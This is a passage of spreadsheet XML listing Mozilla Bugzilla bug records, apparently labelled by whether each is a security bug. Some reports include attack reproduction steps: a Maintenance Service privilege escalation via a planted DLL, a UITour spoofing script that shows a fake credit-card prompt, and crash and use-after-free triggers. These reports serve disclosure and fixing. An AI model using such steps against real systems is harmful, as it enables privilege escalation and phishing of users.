      <c r="U2564" t="n">
        <v>0</v>
      </c>
      <c r="V2564" t="n">
        <v>6</v>
      </c>
      <c r="W2564" t="inlineStr">
        <is>
          <t>These are required to fully switch to the new search API backend. The "-" is how it is now when the waffle is enabled. The "+" is what we want it to be.
- "app_type": 1,
+ "app_type": "hosted",
- "content_ratings": {},
+ "content_ratings": null,
- "homepage": null,
+ "homepage": "",
- "id": 393011,
+ "id": "393011",
Add:
* payment_account -- this might just be if there isn't one found use null as a default.
* upsell (bug 867896) -- also might be missing a null as a default.
* summary (unless bug 862603 lands) -- needs to be l10n'd.
* privacy_policy (unless bug 870557 lands first) -- the time might be better spent on that bug.</t>
        </is>
      </c>
      <c r="X2564" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2565">
      <c r="A2565" t="n">
        <v>765179</v>
      </c>
      <c r="B2565" t="inlineStr">
        <is>
          <t>2012-06-15 03:43:09 -0700</t>
        </is>
      </c>
      <c r="C2565" t="inlineStr">
        <is>
          <t>WebGL crash when empty string is passed to getUniformLocation, getAttribLocation or bindAttribLocation [@mozilla::WebGLProgram::MapIdentifier]</t>
        </is>
      </c>
      <c r="D2565" t="inlineStr">
        <is>
          <t>2012-07-20 18:30:23 -0700</t>
        </is>
      </c>
      <c r="E2565" t="n">
        <v>1</v>
      </c>
      <c r="F2565" t="n">
        <v>1</v>
      </c>
      <c r="G2565" t="n">
        <v>3</v>
      </c>
      <c r="H2565" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2565" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2565" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2565" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2565" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2565" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2565" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2565" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2565" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+] webgl-test-needed</t>
        </is>
      </c>
      <c r="Q2565" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2565" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2565" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T2565" t="n">
        <v>1</v>
      </c>
      <c r="U2565" t="n">
        <v>0</v>
      </c>
      <c r="V2565" t="n">
        <v>25</v>
      </c>
      <c r="W2565" t="inlineStr">
        <is>
          <t>Created attachment 633467
testcase
This bug is related to bug 765161. 
A square bracket value as the third parameter of bindAttribLocation() will result in a crash. An empty string '' will also lead to a crash. Although this bug is most likely caused by the same issue described in bug 765161, I have created a separate bug for this particular method.
gl.bindAttribLocation(pg, 1, []);</t>
        </is>
      </c>
      <c r="X2565" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2566">
      <c r="A2566" t="n">
        <v>1874560</v>
      </c>
      <c r="B2566" t="inlineStr">
        <is>
          <t>2024-01-13 09:31:54 -0800</t>
        </is>
      </c>
      <c r="C2566" t="inlineStr">
        <is>
          <t>iOS Firefox Focus file:// URI address bar spoofing</t>
        </is>
      </c>
      <c r="D2566" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:43 -0700</t>
        </is>
      </c>
      <c r="E2566" t="n">
        <v>1</v>
      </c>
      <c r="F2566" t="n">
        <v>1</v>
      </c>
      <c r="G2566" t="n">
        <v>2</v>
      </c>
      <c r="H2566" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2566" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J2566" t="inlineStr">
        <is>
          <t>Security: iOS</t>
        </is>
      </c>
      <c r="K2566" t="inlineStr">
        <is>
          <t>Firefox 126</t>
        </is>
      </c>
      <c r="L2566" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2566" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2566" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2566" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2566" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q2566" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2566" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2566" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2566" t="n">
        <v>1</v>
      </c>
      <c r="U2566" t="n">
        <v>0</v>
      </c>
      <c r="V2566" t="n">
        <v>20</v>
      </c>
      <c r="W2566" t="inlineStr">
        <is>
          <t>We are able to spoof address bar of iOS Firefox Focus with file:// URI as if we are on https.
This is worse than some spoof issues like https://bugs.chromium.org/p/chromium/issues/detail?id=809062 since file:// part is not viewable by users but only facebook.com just like when we are on https.</t>
        </is>
      </c>
      <c r="X2566" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2567">
      <c r="A2567" t="n">
        <v>1348645</v>
      </c>
      <c r="B2567" t="inlineStr">
        <is>
          <t>2017-03-19 04:18:46 -0700</t>
        </is>
      </c>
      <c r="C2567" t="inlineStr">
        <is>
          <t>Maintenance Service updater PatchFile file manipulation</t>
        </is>
      </c>
      <c r="D2567" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:48 -0700</t>
        </is>
      </c>
      <c r="E2567" t="n">
        <v>1</v>
      </c>
      <c r="F2567" t="n">
        <v>1</v>
      </c>
      <c r="G2567" t="n">
        <v>3</v>
      </c>
      <c r="H2567" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2567" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2567" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2567" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2567" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2567" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2567" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2567" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2567" t="inlineStr">
        <is>
          <t>[adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q2567" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2567" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2567" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2567" t="n">
        <v>1</v>
      </c>
      <c r="U2567" t="n">
        <v>0</v>
      </c>
      <c r="V2567" t="n">
        <v>24</v>
      </c>
      <c r="W2567" t="inlineStr">
        <is>
          <t>Created attachment 8848862
poc.up.zip
During a partial update some files are updated by reading the old file as a source file and do some modifications to it. A vulnerability exists because under certain conditions instead of the path of the original file in the firefox installation directory the attacker chosen callback parameter path is used for loading the source file (see PatchFile::Execute in updater.cpp). The conditions are that the callback parameter path must have the length &lt;path of original file&gt;-1 and has to point to a file with the same name as the original file. 
This can be used to manipulate a file in the firefox directory and further to escalate privileges during a partial update with the maintenance service by manipulating the maintenanceservice.exe which will be executed with system rights during an update.
Steps to reproduce (tested with windows 7 64bit):
1.) install firefox 51 from https://ftp.mozilla.org/pub/firefox/releases/51.0.1/win32/en-US/Firefox%20Setup%2051.0.1.exe to C:\Program Files (x86)\Mozilla Firefox
2.) create a C:\updatework directory and download https://ftp.mozilla.org/pub/firefox/releases/52.0/update/win32/en-US/firefox-51.0.1-52.0.partial.mar as update.mar to it
3.) download and extract poc.up.zip
4.) create a C:\a directory and copy 123.dll (payload which executes calc.exe) from the poc directory to it
5.) create a C:\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa directory and copy maintenanceservice.exe (manipulated to load the 123.dll) from the poc directory to it
6.) execute poc.bat
Some time after executing poc.bat you will see a calc.exe running with system rights in the process list.</t>
        </is>
      </c>
      <c r="X2567" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2568">
      <c r="A2568" t="n">
        <v>1643437</v>
      </c>
      <c r="B2568" t="inlineStr">
        <is>
          <t>2020-06-04 10:53:28 -0700</t>
        </is>
      </c>
      <c r="C2568" t="inlineStr">
        <is>
          <t>Crash in [@ nr_ice_component_process_incoming_check]</t>
        </is>
      </c>
      <c r="D2568" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:21 -0800</t>
        </is>
      </c>
      <c r="E2568" t="n">
        <v>1</v>
      </c>
      <c r="F2568" t="n">
        <v>1</v>
      </c>
      <c r="G2568" t="n">
        <v>3</v>
      </c>
      <c r="H2568" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2568" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2568" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K2568" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2568" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2568" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2568" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2568" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2568" t="inlineStr">
        <is>
          <t>[adv-main78+r][adv-esr68.10+r][sec-survey]</t>
        </is>
      </c>
      <c r="Q2568" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2568" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2568" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T2568" t="n">
        <v>1</v>
      </c>
      <c r="U2568" t="n">
        <v>0</v>
      </c>
      <c r="V2568" t="n">
        <v>16</v>
      </c>
      <c r="W2568" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-54620aeb-8b4a-4d7d-ac49-122e50200604.
Top 10 frames of crashing thread:
```
0 xul.dll nr_ice_component_process_incoming_check media/mtransport/third_party/nICEr/src/ice/ice_component.c:905
1 xul.dll nr_ice_component_stun_server_cb media/mtransport/third_party/nICEr/src/ice/ice_component.c:1003
2 xul.dll nr_stun_server_process_request media/mtransport/third_party/nICEr/src/stun/stun_server_ctx.c:327
3 xul.dll nr_ice_socket_readable_cb media/mtransport/third_party/nICEr/src/ice/ice_socket.c:120
4 xul.dll mozilla::NrUdpSocketIpc::recv_callback_s media/mtransport/nr_socket_prsock.cpp:1594
5 xul.dll static std::_Invoker_pmf_pointer::_Call&lt;void  
6 xul.dll mozilla::runnable_args_memfn&lt;RefPtr&lt;mozilla::NrUdpSocketIpc&gt;, void  media/mtransport/runnable_utils.h:121
7 xul.dll mozilla::detail::runnable_args_base&lt;mozilla::detail::NoResult&gt;::Run media/mtransport/runnable_utils.h:41
8 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1211
9 xul.dll NS_ProcessNextEvent xpcom/threads/nsThreadUtils.cpp:501
```
Seems to be happening on all release channels.</t>
        </is>
      </c>
      <c r="X2568" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2569">
      <c r="A2569" t="n">
        <v>711714</v>
      </c>
      <c r="B2569" t="inlineStr">
        <is>
          <t>2011-12-17 05:54:35 -0800</t>
        </is>
      </c>
      <c r="C2569" t="inlineStr">
        <is>
          <t>[SECURITY] The User.offer_account_by_email WebService method lets you create new user accounts independently of the value of Bugzilla::Auth::Verify::*::user_can_create_account</t>
        </is>
      </c>
      <c r="D2569" t="inlineStr">
        <is>
          <t>2011-12-29 09:03:14 -0800</t>
        </is>
      </c>
      <c r="E2569" t="n">
        <v>1</v>
      </c>
      <c r="F2569" t="n">
        <v>1</v>
      </c>
      <c r="G2569" t="n">
        <v>4</v>
      </c>
      <c r="H2569" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2569" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2569" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K2569" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L2569" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2569" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2569" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2569" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2569" t="inlineStr"/>
      <c r="Q2569" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2569" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2569" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T2569" t="n">
        <v>1</v>
      </c>
      <c r="U2569" t="n">
        <v>0</v>
      </c>
      <c r="V2569" t="n">
        <v>10</v>
      </c>
      <c r="W2569" t="inlineStr">
        <is>
          <t>createaccount.cgi rejects new account requests when $user-&gt;authorizer-&gt;user_can_create_account is false. But when calling User.offer_account_by_email, an email is sent in all cases to the user, and the link in the email let's you create a new account independently of what user_can_create_account is set to.
Depending on how the authentication method is set, having an account in the DB may be enough to log in. For e.g. LDAP or RADIUS, I doubt this is exploitable, because the validation would fail (having an account in the DB doesn't mean they will recognize you). But with custom authentication methods where there is an external validator which only accepts to insert new accounts in the DB under some circumstances, I think this is exploitable.
I think that User.offer_account_by_email should check what user_can_create_account is set to, and if set to false, no email should be sent. And maybe token.cgi should also reject the new account request if this setting is false, in case the email has been sent before account creation has been disabled.
User.offer_account_by_email exists since Bugzilla 2.23.3, see bug 350232.</t>
        </is>
      </c>
      <c r="X2569" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2570">
      <c r="A2570" t="n">
        <v>1316960</v>
      </c>
      <c r="B2570" t="inlineStr">
        <is>
          <t>2016-11-11 13:08:44 -0800</t>
        </is>
      </c>
      <c r="C2570" t="inlineStr">
        <is>
          <t>Include Adjust SDK License</t>
        </is>
      </c>
      <c r="D2570" t="inlineStr">
        <is>
          <t>2016-11-22 15:22:55 -0800</t>
        </is>
      </c>
      <c r="E2570" t="n">
        <v>1</v>
      </c>
      <c r="F2570" t="n">
        <v>1</v>
      </c>
      <c r="G2570" t="n">
        <v>2</v>
      </c>
      <c r="H2570" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2570" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J2570" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2570" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="L2570" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2570" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2570" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2570" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2570" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q2570" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2570" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2570" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2570" t="n">
        <v>1</v>
      </c>
      <c r="U2570" t="n">
        <v>0</v>
      </c>
      <c r="V2570" t="n">
        <v>2</v>
      </c>
      <c r="W2570" t="inlineStr">
        <is>
          <t>Include the Adjust SDK Llicene from https://github.com/adjust/ios_sdk/blob/master/MIT-LICENSE in our own licenses.html</t>
        </is>
      </c>
      <c r="X2570" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2571">
      <c r="A2571" t="n">
        <v>1846687</v>
      </c>
      <c r="B2571" t="inlineStr">
        <is>
          <t>2023-08-02 00:10:02 -0700</t>
        </is>
      </c>
      <c r="C2571" t="inlineStr">
        <is>
          <t>use-after-free in mStream</t>
        </is>
      </c>
      <c r="D2571" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:18 -0700</t>
        </is>
      </c>
      <c r="E2571" t="n">
        <v>1</v>
      </c>
      <c r="F2571" t="n">
        <v>1</v>
      </c>
      <c r="G2571" t="n">
        <v>3</v>
      </c>
      <c r="H2571" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2571" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2571" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2571" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2571" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2571" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2571" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2571" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2571" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main117+] [adv-esr115.2+] [adv-esr102.15+]</t>
        </is>
      </c>
      <c r="Q2571" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2571" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2571" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T2571" t="n">
        <v>1</v>
      </c>
      <c r="U2571" t="n">
        <v>0</v>
      </c>
      <c r="V2571" t="n">
        <v>27</v>
      </c>
      <c r="W2571" t="inlineStr">
        <is>
          <t>Created attachment 9346868
ASAN.txt
While graphics rendering, |mStream| is used to receive rendering data[1]. |mStream| could be destroyed when initialized. However, there is no check in init function[2] and it could initialize twice. This could lead to use-after-free when |mStream| is destroyed during accessing rendering data.
[1]: https://searchfox.org/mozilla-central/source/gfx/layers/ipc/CanvasTranslator.h#261 
[2]: https://searchfox.org/mozilla-central/source/gfx/layers/ipc/CanvasTranslator.cpp#138 
REPRODUCE
Operating System: All
1.apply *patch1.diff and patch2.diff
2.visit index.html
*: patch1.diff is emulating a compromised content process. patch2.diff is patching the Graphic Process to improve the success rate (just for reproducing easily)
Crash State: see asan file</t>
        </is>
      </c>
      <c r="X2571" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2572">
      <c r="A2572" t="n">
        <v>1079554</v>
      </c>
      <c r="B2572" t="inlineStr">
        <is>
          <t>2014-10-07 15:28:44 -0700</t>
        </is>
      </c>
      <c r="C2572" t="inlineStr">
        <is>
          <t>UITour: onPageEvent doesn't ignore API calls from background tabs</t>
        </is>
      </c>
      <c r="D2572" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:26 -0700</t>
        </is>
      </c>
      <c r="E2572" t="n">
        <v>1</v>
      </c>
      <c r="F2572" t="n">
        <v>1</v>
      </c>
      <c r="G2572" t="n">
        <v>2</v>
      </c>
      <c r="H2572" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2572" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2572" t="inlineStr">
        <is>
          <t>Tours</t>
        </is>
      </c>
      <c r="K2572" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2572" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2572" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2572" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2572" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2572" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q2572" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2572" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2572" t="inlineStr">
        <is>
          <t>Firefox 38</t>
        </is>
      </c>
      <c r="T2572" t="n">
        <v>1</v>
      </c>
      <c r="U2572" t="n">
        <v>0</v>
      </c>
      <c r="V2572" t="n">
        <v>25</v>
      </c>
      <c r="W2572" t="inlineStr">
        <is>
          <t>Created attachment 8501386
Screen Shot of example exploit
UITour annotations/behaviour is torn down when a non-Tour tab is selected but we aren't preventing UITour API calls from background tabs on the whitelist.
If one of the whitelisted mozilla.org websites was compromised, users could be tricked into taking an action on some other tab using showInfo (an info panel anchored in the browser chrome). The info panel can cover the address bar and doesn't dismiss with outside clicks (the X would have be clicked).
Example code you can run on https://www.mozilla.org/en-US/firefox/35.0a1/tour/ in the Web Console:
window.onclick = function () {
  window.open('https://people.mozilla.org/~mnoorenberghe/bugs/evil.htm')
  setTimeout(function () {
    Mozilla.UITour.showInfo('selectedTabIcon',
                            'Enter your credit card to purchase Mozilla Firefox!',
                            'Three easy payments of $9.99',
                            '//mozorg.cdn.mozilla.net/media/img/firefox/australis/logo.png?2014-03')
  }, 400)
}
Once you have run this, click anywhere in the empty area of the page to have the spoofing tab and info panel open.</t>
        </is>
      </c>
      <c r="X2572" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2573">
      <c r="A2573" t="n">
        <v>336094</v>
      </c>
      <c r="B2573" t="inlineStr">
        <is>
          <t>2006-05-01 03:54:07 -0700</t>
        </is>
      </c>
      <c r="C2573" t="inlineStr">
        <is>
          <t>[@ nsNSSSocketInfo::GetSSLStatus]</t>
        </is>
      </c>
      <c r="D2573" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E2573" t="n">
        <v>1</v>
      </c>
      <c r="F2573" t="n">
        <v>1</v>
      </c>
      <c r="G2573" t="n">
        <v>6</v>
      </c>
      <c r="H2573" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2573" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2573" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K2573" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2573" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2573" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2573" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2573" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2573" t="inlineStr">
        <is>
          <t>[kerh-bra]</t>
        </is>
      </c>
      <c r="Q2573" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2573" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2573" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T2573" t="n">
        <v>1</v>
      </c>
      <c r="U2573" t="n">
        <v>0</v>
      </c>
      <c r="V2573" t="n">
        <v>11</v>
      </c>
      <c r="W2573" t="inlineStr">
        <is>
          <t>Incident ID: 18122610 
Stack Signature nsNSSSocketInfo::GetSSLStatus ad19d98a 
Product ID ThunderbirdTrunk 
Build ID 2006042909 
Trigger Time 2006-04-29 21:55:19.0 
Platform Win32 
Operating System Windows NT 5.1 build 2600 
Module thunderbird.exe + (00416283) 
URL visited  
User Comments  
Since Last Crash 486 sec 
Total Uptime 486 sec 
Trigger Reason Access violation 
Source File, Line No. e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/security/manager/ssl/src/nsNSSIOLayer.cpp, line 439 
Stack Trace  
nsNSSSocketInfo::GetSSLStatus  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/security/manager/ssl/src/nsNSSIOLayer.cpp, line 439]
nsGridRowLayout::GetParentGridPart  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/xul/base/src/grid/nsGridRowLayout.cpp, line 89]
nsGridRowLayout::GetGrid  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/xul/base/src/grid/nsGridRowLayout.cpp, line 120]
nsGridRowGroupLayout::ChildAddedOrRemoved  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/xul/base/src/grid/nsGridRowGroupLayout.cpp, line 81]
nsGridRowLayout::ChildrenRemoved  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/xul/base/src/grid/nsGridRowLayout.cpp, line 66]
nsCSSFrameConstructor::ConstructXULFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 6612]
nsCSSFrameConstructor::ConstructFrameInternal  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 8121]
nsCSSFrameConstructor::ConstructFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 7989]
nsCSSFrameConstructor::ProcessChildren  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 11824]
nsCSSFrameConstructor::ConstructXULFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 6598]
nsCSSFrameConstructor::ConstructFrameInternal  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 8121]
nsCSSFrameConstructor::ConstructFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 7989]
nsCSSFrameConstructor::ProcessChildren  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 11824]
nsCSSFrameConstructor::ConstructXULFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 6598]
nsCSSFrameConstructor::ConstructFrameInternal  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 8121]
nsCSSFrameConstructor::ConstructFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 7989]
nsCSSFrameConstructor::ProcessChildren  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 11824]
nsCSSFrameConstructor::ConstructDocElementFrame  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 4680]
nsCSSFrameConstructor::ContentInserted  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 9369]
PresShell::InitialReflow  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/layout/base/nsPresShell.cpp, line 2783]
nsXULDocument::StartLayout  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/content/xul/document/src/nsXULDocument.cpp, line 2017]
nsXULDocument::ResumeWalk  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/content/xul/document/src/nsXULDocument.cpp, line 2954]
nsXULDocument::CachedChromeStreamListener::OnStopRequest  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/content/xul/document/src/nsXULDocument.cpp, line 4158]
nsCachedChromeChannel::HandleLoadEvent  [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/chrome/src/nsChromeProtocolHandler.cpp, line 398]
0x778b0c24
0x000d000a</t>
        </is>
      </c>
      <c r="X2573" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2574">
      <c r="A2574" t="n">
        <v>205668</v>
      </c>
      <c r="B2574" t="inlineStr">
        <is>
          <t>2003-05-14 08:47:42 -0700</t>
        </is>
      </c>
      <c r="C2574" t="inlineStr">
        <is>
          <t>saving web page referencing file: as complete freezes Mozilla</t>
        </is>
      </c>
      <c r="D2574" t="inlineStr">
        <is>
          <t>2019-03-26 10:47:02 -0700</t>
        </is>
      </c>
      <c r="E2574" t="n">
        <v>1</v>
      </c>
      <c r="F2574" t="n">
        <v>1</v>
      </c>
      <c r="G2574" t="n">
        <v>6</v>
      </c>
      <c r="H2574" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2574" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2574" t="inlineStr">
        <is>
          <t>Embedding: APIs</t>
        </is>
      </c>
